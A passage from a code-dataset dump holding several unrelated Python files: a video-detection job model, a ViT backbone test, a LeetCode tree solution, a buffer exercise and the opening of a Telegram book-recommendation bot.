self.frame_count:\n raise IndexError(\n \"Index for stop in slice more then frame count %s\",\n self.frame_count,\n )\n\n if interval.start < 0:\n raise IndexError(\"Index for start in slice is less then 0\")\n\n # Slice stepping is not implemented.\n if interval.step is not None:\n raise NotImplementedError(\"Step in slicing is not implemented\")\n\n # If slicing with `video[0:] or video[0:-1]` all frames from start to\n # end or end-1 of video is wanted.\n if interval.stop is None:\n stop = self.frame_count\n elif interval.stop < 0:\n stop = self.frame_count + interval.stop\n print(stop)\n else:\n stop = interval.stop\n\n numbers = stop - interval.start\n\n self._video_capture = cv.VideoCapture(self._path) # type: ignore\n retval = self._video_capture.set(\n cv.CAP_PROP_POS_FRAMES,\n interval.start, # type: ignore\n )\n\n if not retval:\n raise RuntimeError(\"Unexpected error\") # pragma: no cover\n\n frames = []\n\n for _ in range(numbers):\n retval, img = self._video_capture.read()\n\n if not retval:\n raise RuntimeError(\"Unexpected error\") # pragma: no cover\n frames.append(self._scale_convert(img))\n\n self._video_capture.release()\n return np.array(frames)\n\n def iter_from(self, start: int) -> Generator[np.ndarray, None, None]:\n \"\"\"Iterate from start to the end of the video.\n\n Parameter\n ---------\n start : int\n The frame to start at\n\n Yields\n ------\n np.ndarray :\n A single scaled frame.\n\n Raises\n ------\n RuntimeError :\n Unexpected errors occur with OpenCV\n \"\"\"\n if start >= self.frame_count or start < 0:\n raise IndexError(\n f\"Start is out of bounds for buffer of size {self.frame_count}, got {start}\",\n )\n self._video_capture = cv.VideoCapture(self._path) # type: ignore\n retval = self._video_capture.set(cv.CAP_PROP_POS_FRAMES, start) # type: ignore\n\n if not retval:\n raise RuntimeError(\"Unexpected error\") # pragma: no cover\n\n numbers = self.frame_count - start\n\n for _ in range(numbers):\n retval, img = self._video_capture.read()\n\n if not retval:\n raise RuntimeError(\"Unexpected error\") # pragma: no cover\n yield self._scale_convert(img)\n\n self._video_capture.release()\n\n def __len__(self) -> int:\n \"\"\"Get length of video in frames.\"\"\"\n return self.frame_count\n\n def exists(self) -> bool:\n \"\"\"Check if the file path is a valid file.\"\"\"\n return os.path.isfile(self._path)\n\n @classmethod\n def from_path(\n cls,\n path: str,\n output_width: int = VIDEO_DEFAULT_WIDTH,\n output_height: int = VIDEO_DEFAULT_HEIGHT,\n ) -> Video:\n \"\"\"Named constructor to create a `Video` from path.\n\n Examples\n --------\n >>> video = Video.from_path(\"video.mp4\")\n >>> type(video)\n \n\n Raises\n ------\n FileNotFoundError\n If `path` to file do not exists.\n \"\"\"\n if not Path(path).exists():\n raise FileNotFoundError(\"Video file %s not found.\", path)\n\n timestamp = parse_str_to_date(Path(path).name)\n if timestamp is None:\n raise TimestampNotFoundError(f\"No timestamp found for file {path}\")\n\n height, width, fps, frame_numbers = _get_video_metadata(path)\n\n return cls(\n path=path,\n frame_count=frame_numbers,\n fps=fps,\n width=width,\n height=height,\n timestamp=timestamp,\n output_width=output_width,\n output_height=output_height,\n )\n\n def timestamp_at(self, idx: int) -> datetime:\n \"\"\"Return timestamp at index in video.\n\n Parameter\n ---------\n idx : int\n Index in video.\n\n Return:\n ------\n datetime :\n Timestamp for the frame at index.\n\n \"\"\"\n if idx > self.frame_count:\n raise IndexError\n if idx < 0:\n raise IndexError\n\n return self.timestamp + (timedelta(seconds=int(idx / self.fps)))\n\n def add_detection_frame(self, frame: Frame) -> None:\n \"\"\"Update detected data associated with this video.\n\n Parameters\n ----------\n frames : List[Frame]\n List of data-frames to add to this video. Which contains detections for a given frame.\n force_update : bool\n Will overwrite already stored data-frames of same index with new one in frames parameter.\n Default False.\n\n Raises\n ------\n RuntimeError\n When any frame index goes past total frames in video.\n\n Return\n ------\n bool :\n True when data-frames were successfully updated. False when inputted frames have overlap\n with existing data within video.\n \"\"\"\n if frame in self.frames:\n raise RuntimeError(\n f\"Frame with index {frame.idx} is already added to this video.\",\n )\n if frame.idx > self.frame_count:\n raise IndexError(\n f\"Frame of index {frame.idx} is beyond total frames in video.\",\n )\n\n self.frames.append(frame)\n\n def is_processed(self) -> bool:\n \"\"\"Check if this video has been fully processed.\n\n Return:\n ------\n bool :\n True if the entire video has been processed. The entire detection_frames dict must be fully\n mapped with data-frames for all frames in video.\n \"\"\"\n if not len(self.frames) == self.frame_count:\n logger.info(\n f\"Video {self._path} is not fully processed. {len(self.frames)}/{self.frame_count}\",\n )\n return False\n\n # Check continious index\n for i in range(self.frame_count):\n if self.frames[i].idx != i:\n logger.warning(\n \"Frame index {self.detection_frames[i].idx} does not match videos index {i}\",\n )\n return False\n\n logger.info(\"Video {self._path} is processed.\")\n return True\n\n\ndef parse_str_to_date(string: str, offset_min: int = 30) -> datetime | None:\n \"\"\"Parse string to date.\n\n Input can either be a string with a date, or a string with a date and\n offset. If an offset is found, `offset_min` will be multiplied with the\n offset and the result will be to the returned date.\n\n Parameter\n ---------\n string: str\n string to parse to date on the format:\n `[yyyy-mm-dd_hh-mm-ss]` or `[yyyy-mm-dd_hh-mm-ss]-xxx`\n offset_min: int\n Minutes to offset for each increment\n\n\n Return:\n ------\n datetime :\n parsed datetime object, or None if unsuccessful\n\n Example:\n -------\n >>> parse_str_to_date(\"test-[2020-03-28_12-30-10]-000.mp4\")\n datetime.datetime(2020, 3, 28, 12, 30, 10)\n >>> parse_str_to_date(\"test-[2020-03-28_12-30-10]-001.mp4\")\n datetime.datetime(2020, 3, 28, 13, 0, 10)\n >>> parse_str_to_date(\"test-[2020-03-28_12-30-10].mp4\")\n datetime.datetime(2020, 3, 28, 12, 30, 10)\n >>> parse_str_to_date(\"test.mp4\")\n None\n \"\"\"\n match = re.compile(\n r\"\\[\\d{4}(-\\d{2}){2}_(\\d{2}-){2}\\d{2}\\](-\\d{3})?\",\n ).search(string)\n\n if not match:\n logger.warning(f\"no date found in str, {string}\")\n return None\n\n try:\n # Offset is optional in the regex, (-\\d{3})?. This tries to split on\n # \"]-\", which means there exist an offset, []-. If it\n # fails it means there are no offset.\n timestamp, offset = match[0].split(\"]-\")\n\n # timestamp still has a \"[\" at the start. This strips it.\n timestamp = timestamp[1:]\n offset_int: int = int(offset)\n except ValueError:\n # No offset found, so only grab what's inside the brackets, and set\n # offset to zero.\n timestamp = match[0][1:-1]\n offset_int = 0\n\n date = \"-\".join(timestamp.split(\"_\"))\n\n year, month, day, hour, minute, second = (int(x) for x in date.split(\"-\"))\n\n try:\n return datetime(year, month, day, hour, minute, second) + timedelta(\n minutes=offset_min * offset_int,\n )\n except ValueError:\n return None\n\n\ndef _get_video_metadata(path: str) -> tuple[int, ...]:\n \"\"\"Get metadata from video using `opencv`.\n\n Parameter\n ---------\n path : str\n path to file to get metadata from.\n\n Return:\n ------\n Typle[int, int, int, int] :\n A tuple with the metadata:\n (height, width, FPS, frame_count)\n\n Raises\n ------\n FileNotFoundError:\n If the file can't be opened it will throw FileNotFoundError\n RuntimeError:\n If there are problems getting any metadata.\n \"\"\"\n video = cv.VideoCapture(path) # type: ignore\n\n if not video.isOpened():\n raise FileNotFoundError(f\"Could not open {path}\")\n\n metadata = (\n int(video.get(cv.CAP_PROP_FRAME_HEIGHT)), # type: ignore\n int(video.get(cv.CAP_PROP_FRAME_WIDTH)), # type: ignore\n int(video.get(cv.CAP_PROP_FPS)), # type: ignore\n int(video.get(cv.CAP_PROP_FRAME_COUNT)), # type: ignore\n )\n\n video.release()\n\n # Frame count becomes \"-9223372036854775808\" when testing with png. Opencv\n # should return 0 if it fails, but apparently not in this case...\n for meta in metadata:\n if meta < 1:\n raise RuntimeError(f\"Could not get metadata for file {path}\")\n\n return metadata\n\n\n@dataclass\nclass Frame:\n \"\"\"Simple dataclass representing frame.\"\"\"\n\n idx: int\n detections: list[Detection]\n timestamp: datetime | None = None\n video_id: int | None = None\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Check if two Frames are the same.\"\"\"\n return (\n isinstance(other, Frame)\n and self.idx == other.idx\n and self.video_id == other.video_id\n )\n\n def to_json(self) -> dict[str, Any]:\n \"\"\"Convert frame to json.\n\n Return:\n ------\n Dict[str, Any] :\n Object as json:\n {\n \"idx\": int,\n \"detections\": List[Detection],\n \"timestamp\": None|str\n }\n\n \"\"\"\n timestamp_tmp: str | None = None\n if self.timestamp:\n timestamp_tmp = self.timestamp.isoformat()\n else:\n timestamp_tmp = None\n\n return {\n \"idx\": self.idx,\n \"detections\": [det.to_json() for det in self.detections if det],\n \"timestamp\": timestamp_tmp,\n \"video_id\": self.video_id,\n }\n\n\n@dataclass\nclass BBox:\n \"\"\"Class representing a Bounding box.\"\"\"\n\n x1: float\n y1: float\n x2: float\n y2: float\n\n\n@dataclass\nclass Detection:\n \"\"\"Class representing a Detection.\n\n Parameter\n ---------\n bbox: BBox\n A bounding box\n probaility: float\n Probability from detection\n label: int\n Class label from detection\n frame: int\n Which absolute frame it belongs to\n frame_id: int\n The relative frame in a video\n video_id: int\n ID of the video this detection is found.\n\n Example:\n -------\n >>> bbox = BBox(10,20,30,40)\n >>> detection = (bbox, 0.8, 1, 4)\n >>> print(detection)\n (BBox(x1=10, y1=20, x2=30, y2=40), 0.8, 1, 4)\n \"\"\"\n\n bbox: BBox\n probability: float\n label: int\n frame: int\n frame_id: int | None = None\n video_id: int | None = None\n\n def to_json(self) -> dict[str, Any]:\n \"\"\"Convert detection to json.\n\n Return:\n ------\n Dict[str, Any] :\n Detection as json,\n {\n \"bbox\": BBox,\n \"probability\": float,\n \"label\": int,\n \"frame\": int,\n }\n\n \"\"\"\n return {\n \"bbox\": asdict(self.bbox),\n \"probability\": self.probability,\n \"label\": self.label,\n \"frame\": self.frame,\n \"frame_id\": self.frame_id,\n \"video_id\": self.video_id,\n }\n\n def set_frame(\n self,\n frame: int,\n frame_id: int,\n video_id: int | None,\n ) -> Detection:\n \"\"\"Update frame nr.\n\n Returns itself so it can be used in list comprehensions.\n\n Parameter\n ---------\n frame : int\n The frame number the detection is found in.\n\n Return:\n ------\n Detection :\n Returns self.\n \"\"\"\n if not isinstance(frame_id, int):\n raise RuntimeError(f\"Frame: expected int, got {type(frame_id)}\")\n\n if not isinstance(video_id, int):\n raise RuntimeError(f\"Video: expected int, got {type(video_id)}\")\n\n self.frame = frame\n self.frame_id = frame_id\n self.video_id = video_id\n\n return self\n\n @classmethod\n def from_api(\n cls,\n bbox: dict[str, Any],\n probability: float,\n label: int,\n frame: int,\n frame_id: int,\n video_id: int,\n ) -> Detection:\n \"\"\"Create Detection class from tracker.\n\n Parameter\n ---------\n bbox: Dict[Any, str]\n Dict representation of BBox\n probaility: float\n Probability from detection\n label: int\n Class label from detection\n frame: int\n Which frame it belongs to\n\n Return:\n ------\n Detection :\n A detection object\n \"\"\"\n return cls(BBox(**bbox), probability, label, frame, frame_id, video_id)\n\n\nclass Object:\n \"\"\"Class representation of an object that has been detected and tracked.\"\"\"\n\n def __init__(\n self,\n label: int,\n detections: list[Detection] | None = None,\n track_id: int | None = None,\n ) -> None:\n \"\"\"Create an Object.\n\n Parameters\n ----------\n label : int\n The label given to it by the tracker and detector\n detections : List[Detection]\n List of detections accociated with this object. Default=[]\n track_id : int\n Tracking ID for this object. Default=None\n \"\"\"\n self.id: int | None\n self.label: int = label\n self.probability: float = 0.0\n self._detections = detections if detections is not None else []\n self.track_id: int | None = track_id\n self.time_in: datetime | None = None\n self.time_out: datetime | None = None\n self._calc_label()\n\n def to_api(self) -> dict[str, Any]:\n \"\"\"Convert relevant member data for use in api.\n\n Returns\n -------\n Dict[str, Any]\n Returns mapping between variable name and value.\n \"\"\"\n return {\n \"id\": self.id,\n \"label\": self.label,\n \"probability\": self.probability,\n \"_detections\": self._detections,\n \"time_in\": self.time_in,\n \"time_out\": self.time_out,\n \"video_ids\": self.video_ids,\n }\n\n def _calc_label(self) -> None:\n \"\"\"Calculate label.\"\"\"\n if len(self._detections) == 0:\n return\n\n self.label = int(\n np.bincount([detect.label for detect in self._detections]).argmax(),\n )\n\n self.probability = sum(\n detect.probability\n for detect in self._detections\n if detect.label == self.label\n ) / len(self._detections)\n\n @classmethod\n def from_api(\n cls,\n track_id: int,\n detections: list[dict[str, Any]],\n label: int,\n ) -> Object:\n \"\"\"Create Object class from tracker.\n\n Parameter\n ---------\n track_id : int\n track_id from tracker\n detections : List[Dict[Any,str]]\n List of detections associated.\n label : int\n Class label\n\n Return:\n ------\n Object :\n Fully featured Object.\n \"\"\"\n dets = [Detection.from_api(**detect) for detect in detections]\n return cls(label, dets, track_id)\n\n def get_results(self) -> dict[str, Any]:\n \"\"\"Return information on this object.\n\n Return:\n ------\n Dict[str, Any] :\n\n \"\"\"\n self._calc_label()\n\n return {\n \"track_id\": self.track_id,\n \"label\": self.label,\n \"probability\": self.probability,\n \"time_in\": self.time_in,\n \"time_out\": self.time_out,\n }\n\n def __eq__(self, o: object) -> bool:\n \"\"\"Check if two Objects are same.\n\n Currently, this doesn't do much, but in the future, it should implement to\n check detections as well.\n \"\"\"\n return (\n isinstance(o, Object)\n and self.label == o.label\n and self.probability == o.probability\n and len(self._detections) == len(o._detections)\n )\n\n def add_detection(self, detection: Detection) -> None:\n \"\"\"Add a detection to the object.\n\n Parameter\n ---------\n detection : Detection\n \"\"\"\n self._detections.append(detection)\n self._calc_label()\n\n def number_of_detections(self) -> int:\n \"\"\"Return the number of detections.\n\n Return:\n ------\n int :\n Number of detections\n \"\"\"\n return len(self._detections)\n\n def get_detection(self, idx: int) -> Detection | None:\n \"\"\"Return the detection at index idx.\n\n Parameter\n ---------\n idx: int\n Index\n\n Return:\n ------\n Optional[Detection] :\n Detection at index idx or None if none found.\n \"\"\"\n try:\n return self._detections[idx]\n except IndexError:\n return None\n\n def get_frames(self) -> list[tuple[int | None, int | None, BBox]]:\n \"\"\"Return which frame and which video this object is in.\n\n frame_id tells what frame in the video with video_id contains a\n detection associated with this object.\n\n Return:\n ------\n List[Tuple[Optional[int], Optional[int], BBox]] :\n [(frame_id, video_id), (frame_id, video_id)]\n \"\"\"\n return [\n (det.frame_id, det.video_id, det.bbox) for det in self._detections\n ]\n\n @property\n def video_ids(self) -> list[int]:\n \"\"\"Derive all video the object is part of.\n\n Return:\n ------\n List[int]\n List of video id's.\n \"\"\"\n video_id: set[int] = set()\n for det in self._detections:\n if det.video_id is not None:\n video_id.add(det.video_id)\n return list(video_id)\n\n\nclass Job:\n \"\"\"Class representation of a job.\"\"\"\n\n def __init__(\n self,\n name: str,\n description: str,\n location: str,\n status: Status = Status.PENDING,\n progress: int = 0,\n ) -> None:\n self.id: int | None = None\n self.name: str = name\n self.description: str = description\n self._status: Status = status\n self._objects: list[Object] = []\n self.videos: list[Video] = []\n self.location: str = location\n self.next_batch: int = 0\n self.progress: int = progress\n\n @property\n def stats(self) -> dict[str, Any]:\n \"\"\"Return statistics for a job.\n\n Return:\n ------\n Dict[str, any] :\n {\n total_objects : int\n total_labels: int\n labels : {\n int : int\n int : int\n ...\n }\n }\n \"\"\"\n dct: dict[str, Any] = {\n \"total_labels\": 0,\n \"total_objects\": 0,\n \"labels\": {},\n }\n\n labels: dict[int, int] = {}\n\n for o in self._objects:\n if o.label not in labels:\n labels[o.label] = 0\n labels[o.label] += 1\n\n dct[\"labels\"] = labels\n dct[\"total_labels\"] = len(dct[\"labels\"])\n dct[\"total_objects\"] = len(self._objects)\n\n return dct\n\n def __hash__(self) -> int:\n \"\"\"Hash of object used in eg. `set()` to avoid duplicate.\"\"\"\n return hash(\n (type(self),)\n + (self.name, self.description, self.id, self.location),\n )\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Check if job is equal to another object.\"\"\"\n if not isinstance(other, Job):\n return False\n # Note: Will not be able to check equality if jobs do not have `id`,\n # as this is the only unique parameter. A job without `id` is not\n # seen by `repository` before, so it is a new `job`.\n if self.id and other.id:\n return self.id == other.id\n return False\n\n def __repr__(self) -> str:\n \"\"\"Override of default __repr__. Gives object representation as a string.\"\"\"\n return str(self.__class__) + \": \" + str(self.__dict__)\n\n def add_object(self, obj: Object) -> None:\n \"\"\"Add an object to a job.\n\n Parameter\n ---------\n obj : Object\n An object to add\n \"\"\"\n self._objects.append(obj)\n\n def number_of_objects(self) -> int:\n \"\"\"Return number of objects.\n\n Return:\n ------\n int :\n Number of objects\n \"\"\"\n return len(self._objects)\n\n def get_object(self, idx: int) -> Object | None:\n \"\"\"Return object at index.\n\n Paramter\n --------\n idx : int\n Index in the list\n\n Return:\n ------\n Optional[Object] :\n Object at index idx. If none are found, returns None.\n \"\"\"\n try:\n return self._objects[idx]\n except IndexError:\n return None\n\n def get_result(self) -> list[dict[str, Any]]:\n \"\"\"Return result from all objects.\n\n Return:\n ------\n List[Dict[str, Any]] :\n\n \"\"\"\n return [obj.get_results() for obj in self._objects]\n\n def add_video(self, video: Video) -> bool:\n \"\"\"Add a video to this job in order to be processed.\n\n Parameter\n ---------\n video : Video\n Video to add to this job. Must have a valid timestamp.\n\n Return:\n ------\n bool :\n True if video has a set timestamp, and is not already in the\n videos list. False otherwise.\n\n \"\"\"\n if video.timestamp is None:\n logger.warning(\"Videos added to job must have set timestamp.\")\n return False\n\n if video in self.videos:\n logger.warning(\"Attempted to add an existing video to a job.\")\n return False\n\n self.videos.append(video)\n self.videos.sort(key=lambda x: x.timestamp.timestamp())\n return True\n\n def add_videos(self, videos: list[Video]) -> bool:\n \"\"\"Add a list of videos to this job in order to be processed.\n\n Parameter\n ---------\n videos : List[Video]\n List of videos to add. All must have a valid timestamp.\n\n Return:\n ------\n bool :\n True if all videos in the list has a timestamp, false otherwise.\n No videos gets added if False is returned.\n \"\"\"\n for video in videos:\n if video in self.videos:\n logger.warning(\"Video has already been added to the job.\")\n return False\n\n if video.timestamp in [v.timestamp for v in videos if v != video]:\n logger.warning(\"Duplicate timestamp.\")\n return False\n\n for video in videos:\n self.videos.append(video)\n\n self.videos.sort(key=lambda x: x.timestamp.timestamp())\n return True\n\n def remove_video(self, video: Video) -> bool:\n \"\"\"Remove an existing video from this job.\n\n Parameter\n ---------\n video : Video\n video to remove from the job.\n\n Return:\n ------\n bool :\n True if the video was removed from the job. False otherwise.\n \"\"\"\n if video in self.videos:\n self.videos.remove(video)\n return True\n else:\n return False\n\n def total_frames(self) -> int:\n \"\"\"Get the total frames in all videos for this job.\n\n Return:\n ------\n int :\n Ammount of frames in total over all video objects in this job.\n \"\"\"\n return sum(v.frame_count for v in self.videos)\n\n def status(self) -> Status:\n \"\"\"Get the job status for this job.\"\"\"\n return self._status\n\n def start(self) -> None:\n \"\"\"Mark the job as started.\"\"\"\n if self._status is Status.DONE or self._status is Status.RUNNING:\n raise JobStatusException(\n \"A running or completed job can not be started.\",\n )\n logger.debug(\"Job '%s' starting\", self.name)\n self._status = Status.RUNNING\n\n def pause(self) -> None:\n \"\"\"Mark the job as paused.\"\"\"\n if self._status not in [Status.RUNNING, Status.QUEUED]:\n raise JobStatusException(\"Only a running job can be paused.\")\n logger.debug(\"Job '%s' paused\", self.name)\n self._status = Status.PAUSED\n\n def complete(self) -> None:\n \"\"\"Mark the job as completed.\"\"\"\n if self._status is not Status.RUNNING:\n raise JobStatusException(\"Only a running job can be completed.\")\n logger.debug(\"Job '%s' marked as completed\", self.name)\n self._status = Status.DONE\n\n def queue(self) -> None:\n \"\"\"Mark the job as queued.\"\"\"\n if self._status not in [Status.PENDING, Status.PAUSED]:\n raise JobStatusException(\n \"Only a pending or paused job can be queued.\",\n )\n logger.debug(\"Job '%s' marked as queued\", self.name)\n self._status = Status.QUEUED\n\n def mark_as_error(self) -> None:\n \"\"\"Mark the job as in a error state.\"\"\"\n if self._status is not Status.RUNNING:\n raise JobStatusException(\"Only a running job can error\")\n logger.debug(\"Job '%s' has status as error\", self.name)\n self._status = Status.ERROR\n\n\nclass JobStatusException(Exception):\n \"\"\"Exception when job attempt to change into invalid state.\"\"\"\n\n\nclass Project:\n \"\"\"Project class.\n\n Top level abstraction for organisation of jobs connected to specified\n projects.\n\n Parameters\n ----------\n id : int\n Project internal id number\n name : str\n Project name\n number : str\n A unique project number. This number is a reference to external\n reference number used by the user.\n location : str\n Optional string representing the location for this project.\n description : str\n Project description.\n\n Attribute\n ---------\n number_of_jobs : int\n Number of jobs associated with project.\n\n Methods\n -------\n add_job(job: Job)\n Adds a new job to project. No duplicates allowed.\n remove_job(number: str)\n Removes job from project.\n list_jobs()\n Returns a list of associated _jobs_.\n \"\"\"\n\n def __init__(\n self,\n name: str,\n number: str,\n description: str,\n location: str | None = None,\n ) -> None:\n self.id: int\n self.name: str = name\n self.number: str = number\n self.description: str = description\n self.location: str | None = location\n self.jobs: list[Job] = []\n\n def __str__(self) -> str:\n \"\"\"Print class members.\"\"\"\n return f\"Name: {self.name}, Description: {self.description}\"\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Check equality between objects.\n\n Operator used in tests to check if objects from DB is correct.\n \"\"\"\n if not isinstance(other, Project):\n return False\n return (\n other.id == self.id\n and other.name == self.name\n and other.description == self.description\n and other.number == self.number\n and other.location == self.location\n )\n\n def __hash__(self) -> int:\n \"\"\"Hash of object used in eg. `dict()` or `set()` to avoid duplicate.\"\"\"\n return hash((type(self),) + tuple(self.__dict__))\n\n def __repr__(self) -> str:\n \"\"\"Override of default __repr__. Gives object representation as a string.\"\"\"\n return (\n str(self.__class__) + \": \" + str(self.__dict__)\n ) # pragma: no cover\n\n @classmethod\n def from_dict(cls, project_data: dict) -> Project:\n \"\"\"Only an example method of a \"named constructor\".\"\"\"\n return cls(\n name=project_data[\"name\"],\n number=project_data[\"number\"],\n description=project_data[\"description\"],\n location=project_data[\"location\"],\n )\n\n @property\n def number_of_jobs(self) -> int:\n \"\"\"Get number of jobs associated with project.\n\n Returns\n -------\n int\n Number of jobs in project\n \"\"\"\n return len(self.jobs)\n\n def add_job(self, job: Job) -> Project:\n \"\"\"Add job to project.\n\n Parameter\n ---------\n job : Job\n Job to be added to project.\n \"\"\"\n if job in self.jobs:\n logger.debug(\n \"Attempted to add existing job '%s' to a project\",\n job.name,\n )\n else:\n logger.debug(\"Added job '%s' to project\", job.name)\n self.jobs.append(job)\n return self\n\n def get_jobs(self) -> list[Job]:\n \"\"\"Retrieve all jobs from the project.\n\n Returns\n -------\n : List[Job]\n List containing all jobs within the project\n \"\"\"\n return self.jobs\n\n def get_job(self, job_id: int) -> Job | None:\n \"\"\"Retrive a single job from the project.\n\n Parameters\n ----------\n job_id : int\n Index of the job we seek. 0 is not valid.\n\n Returns\n -------\n Job\n The job object if found.\n \"\"\"\n for job in self.jobs:\n if job.id == job_id:\n return job\n\n return None\n\n def remove_job(self, job: Job) -> bool:\n \"\"\"Remove job from project.\n\n Parameters\n ----------\n job : Job\n Job to be removed.\n\n Returns\n -------\n bool\n True if the job was successfully removed\n \"\"\"\n if job in self.jobs:\n self.jobs.remove(job)\n logger.debug(\"Removed job with name '%s' from a project\", job.name)\n return True\n else:\n logger.debug(\n \"Could not find job with name '%s' to remove in project\",\n job.name,\n )\n return False\n","repo_name":"tomrtk/fish-code","sub_path":"src/core/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":39728,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"7"}
+{"seq_id":"72864906782","text":"import pytest\nimport torch\n\nfrom mmseg.models.backbones.vit import VisionTransformer\nfrom .utils import check_norm_state\n\n\ndef test_vit_backbone():\n with pytest.raises(TypeError):\n # pretrained must be a string path\n model = VisionTransformer()\n model.init_weights(pretrained=0)\n\n with pytest.raises(TypeError):\n # img_size must be int or tuple\n model = VisionTransformer(img_size=512.0)\n\n with pytest.raises(TypeError):\n # out_indices must be int ,list or tuple\n model = VisionTransformer(out_indices=1.)\n\n with pytest.raises(TypeError):\n # test upsample_pos_embed function\n x = torch.randn(1, 196)\n VisionTransformer.resize_pos_embed(x, 512, 512, 224, 224, 'bilinear')\n\n with pytest.raises(IndexError):\n # forward inputs must be [N, C, H, W]\n x = torch.randn(3, 30, 30)\n model = VisionTransformer()\n model(x)\n\n with pytest.raises(AssertionError):\n # The length of img_size tuple must be lower than 3.\n VisionTransformer(img_size=(224, 224, 224))\n\n with pytest.raises(TypeError):\n # Pretrained must be None or Str.\n VisionTransformer(pretrained=123)\n\n with pytest.raises(AssertionError):\n # with_cls_token must be True when output_cls_token == True\n VisionTransformer(with_cls_token=False, output_cls_token=True)\n\n # Test img_size isinstance tuple\n imgs = torch.randn(1, 3, 224, 224)\n model = VisionTransformer(img_size=(224, ))\n model.init_weights()\n model(imgs)\n\n # Test img_size isinstance tuple\n imgs = torch.randn(1, 3, 224, 224)\n model = VisionTransformer(img_size=(224, 224))\n model(imgs)\n\n # Test norm_eval = True\n model = VisionTransformer(norm_eval=True)\n model.train()\n\n # Test ViT backbone with input size of 224 and patch size of 16\n model = VisionTransformer()\n model.init_weights()\n model.train()\n\n assert check_norm_state(model.modules(), True)\n\n # Test normal size input image\n imgs = torch.randn(1, 3, 224, 224)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 14, 14)\n\n # Test large size input image\n imgs = torch.randn(1, 3, 256, 256)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 16, 16)\n\n # Test small size input image\n imgs = torch.randn(1, 3, 32, 32)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 2, 2)\n\n imgs = torch.randn(1, 3, 224, 224)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 14, 14)\n\n # Test unbalanced size input image\n imgs = torch.randn(1, 3, 112, 224)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 7, 14)\n\n # Test irregular input image\n imgs = torch.randn(1, 3, 234, 345)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 15, 22)\n\n # Test with_cp=True\n model = VisionTransformer(with_cp=True)\n imgs = torch.randn(1, 3, 224, 224)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 14, 14)\n\n # Test with_cls_token=False\n model = VisionTransformer(with_cls_token=False)\n imgs = torch.randn(1, 3, 224, 224)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 14, 14)\n\n # Test final norm\n model = VisionTransformer(final_norm=True)\n imgs = torch.randn(1, 3, 224, 224)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 14, 14)\n\n # Test patch norm\n model = VisionTransformer(patch_norm=True)\n imgs = torch.randn(1, 3, 224, 224)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 14, 14)\n\n # Test output_cls_token\n model = VisionTransformer(with_cls_token=True, output_cls_token=True)\n imgs = torch.randn(1, 3, 224, 224)\n feat = model(imgs)\n assert feat[0][0].shape == (1, 768, 14, 14)\n assert feat[0][1].shape == (1, 768)\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"PyTorch/contrib/cv/semantic_segmentation/DeeplabV3_for_Pytorch/tests/test_models/test_backbones/test_vit.py","file_name":"test_vit.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"}
+{"seq_id":"72685358624","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val, children):\n self.val = val\n self.children = children\n\"\"\"\n\nfrom collections import deque\n\nclass Solution:\n def maxDepth(self, root: 'Node') -> int:\n if root is None:\n return 0\n\n self.max_depth = 0\n self._helper(root, 1)\n\n return self.max_depth\n \n def _helper(self, node, depth: int):\n self.max_depth = max(depth, self.max_depth)\n for child in node.children:\n if child is not None:\n self._helper(child, depth+1)\n","repo_name":"daviddwlee84/LeetCode","sub_path":"Python3/BinaryTree/MaximumDepthOfNaryTree/Naive559.py","file_name":"Naive559.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"7"}
+{"seq_id":"22961876795","text":"# Zadatak 1.15Napisati program koji imitira rad bafera. Maksimalni broj elemenata u baferuje5. Korisnik sa standardnog ulaza unosi podatke do unosa rečiquit. Program ih smešta u bafer,posto se bafer napuni unosi se ispisuju na standarni izlaz i bafer se prazn\n\nbufer = [] \n\ni = 0 \n\nwhile (True):\n try:\n bufer.append(int(input()))\n i += 1\n \n if i == 5:\n i = 0\n print(bufer)\n bufer = []\n print(\"bufer se ispraznio\")\n continue\n\n except:\n print(\"FAILED\")\n break","repo_name":"fongsd/pp","sub_path":"pp/python/1_15.py","file_name":"1_15.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"25872478405","text":"import pandas as pd\nimport numpy as np\nimport scipy.sparse as sp\nimport time, copy, os, pickle, re\nfrom lightfm import LightFM\nfrom fuzzywuzzy import fuzz, process\n\nfrom utils import (\n DatasetFaster,\n fetch_user_ratings_dataset,\n fetch_user_ratings_goodreads,\n predict_list,\n load_model,\n book_map,\n fancy_title,\n fancy_list\n)\n\nfrom config import *\n\nfrom telegram import Update, ReplyKeyboardMarkup\nfrom telegram.ext import (\n Updater,\n CommandHandler,\n MessageHandler,\n Filters,\n ConversationHandler,\n CallbackQueryHandler,\n CallbackContext,\n)\n\n\nCHOOSING_SCENARIO, SELECTING_ENGINE = map(chr, range(2))\nCHOOSING_USER_ID, CHOOSING_GR_ID, CHOOSING_CUSTOM = map(chr, range(2, 5))\nTYPING_USER, TYPING_GOODREADS, TYPING_BOOK, SELECTING_RATING = map(chr, range(5, 9))\n\n\ndef start(update, context):\n context.user_data['user_ratings'] = None\n context.user_data['rated_dict'] = {}\n context.user_data['selected_book'] = None\n \n update.message.reply_text(text=start_text, disable_web_page_preview=True)\n \n buttons = [[\n 'Dataset Id',\n 'GoodReads Id',\n 'Custom Setup'\n ]]\n keyboard = ReplyKeyboardMarkup(buttons, one_time_keyboard=True)\n update.message.reply_text(text=scenario_text, reply_markup=keyboard)\n\n return CHOOSING_SCENARIO\n\n\ndef 